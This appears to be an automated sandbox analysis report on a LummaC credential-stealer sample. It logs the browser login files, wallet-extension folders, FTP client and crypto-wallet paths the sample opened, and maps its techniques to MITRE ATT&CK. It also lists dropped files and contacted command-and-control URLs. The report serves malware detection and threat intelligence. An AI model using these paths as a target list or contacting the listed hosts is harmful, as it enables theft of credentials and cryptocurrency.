Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\ZIPXYXWIOY	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Directory queried: C:\Users\user\Documents\AQRFEVRTGL	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	13 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	12 Process Injection	2 Obfuscated Files or Information	11 Input Capture	25 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	11 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	111 Masquerading	NTDS	3 Process Discovery	Distributed Component Object Model	1 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	221 Virtualization/Sandbox Evasion	LSA Secrets	221 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
!Setup.exe	3%	ReversingLabs	Win32.Malware.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\243714\Publisher.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	16%	ReversingLabs	Win32.Spyware.Lummastealer
C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-E1U3K.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-GVMHV.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
https://klipvumisui.shop/int_clp_sha.txt	0%	Avira URL Cloud	safe
http://crl.usertr	0%	Avira URL Cloud	safe
http://www.faststone.org/	0%	Avira URL Cloud	safe
https://dfgh.online	0%	Avira URL Cloud	safe
https://www.faststone.org/order.htmU	0%	Avira URL Cloud	safe
http://www.faststone.org/U	0%	Avira URL Cloud	safe
https://dfgh.online/invoker.php?compName=	0%	Avira URL Cloud	safe
https://dfgh.online/invoker.php?compName=user-PC	0%	Avira URL Cloud	safe
http://www.faststone.org/FSCTutorial.htmU	0%	Avira URL Cloud	safe
http://www.faststone.org/FSCTutorial.htm	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txt	100%	Avira URL Cloud	malware
https://laborersquei.click/api	0%	Avira URL Cloud	safe
https://www.faststone.org/order.htm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	high
laborersquei.click	104.21.89.250	true	false	high
klipvumisui.shop	104.21.37.128	true	false	unknown
ArHGNpsPYiljnDdfvwsaosASId.ArHGNpsPYiljnDdfvwsaosASId	unknown	unknown	false	unknown
dfgh.online	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://klipvumisui.shop/int_clp_sha.txt	false	Avira URL Cloud: safe	unknown
https://cegu.shop/8574262446/ph.txt	false	Avira URL Cloud: malware	unknown
https://laborersquei.click/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000000.2849006736.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://repository.certum.pl/cscasha2.cer0	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://ocsp.sectigo.com0	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr, _isdecmp.dll.19.dr	false		high
http://crl.usertr	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dfgh.online/invoker.php?compName=	powershell.exe, 00000010.00000002.2645597894.00000000009A0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://dfgh.online/invoker.php?compName=user-PC	powershell.exe, 00000010.00000002.2646877718.0000000004D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2646877718.0000000004B86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2651074303.0000000007119000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
https://www.autoitscript.com/autoit3/	Amend.9.dr, Publisher.com.2.dr	false		high
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	false		high
http://www.faststone.org/FSCTutorial.htmU	vsv_tool.exe, 00000030.00000000.3333564864.0000000000621000.00000020.00000001.01000000.0000000F.sdmp	false	Avira URL Cloud: safe	unknown
https://www.remobjects.com/ps	9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2852184908.000000000370F000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2855637475.000000007ED8B000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000000.2858778988.0000000000301000.00000020.00000001.01000000.0000000B.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000000.2879360907.0000000000E2D000.00000020.00000001.01000000.0000000D.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	false		high
http://crt.sectigo.com/Sectig	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	false		high
http://subca.ocsp-certum.com01	9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2872970031.0000000002BA0000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000003.2861623604.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000002.3348366732.0000000002F70000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.21.dr, _isdecmp.dll.19.dr	false		high
https://contoso.com/	powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000010.00000002.2649429807.0000000005A95000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.innosetup.com/	9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2852184908.000000000370F000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.exe, 00000012.00000003.2855637475.000000007ED8B000.00000004.00001000.00020000.00000000.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000013.00000000.2858778988.0000000000301000.00000020.00000001.01000000.0000000B.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp, 00000015.00000000.2879360907.0000000000E2D000.00000020.00000001.01000000.0000000D.sdmp, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr, 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	false		high
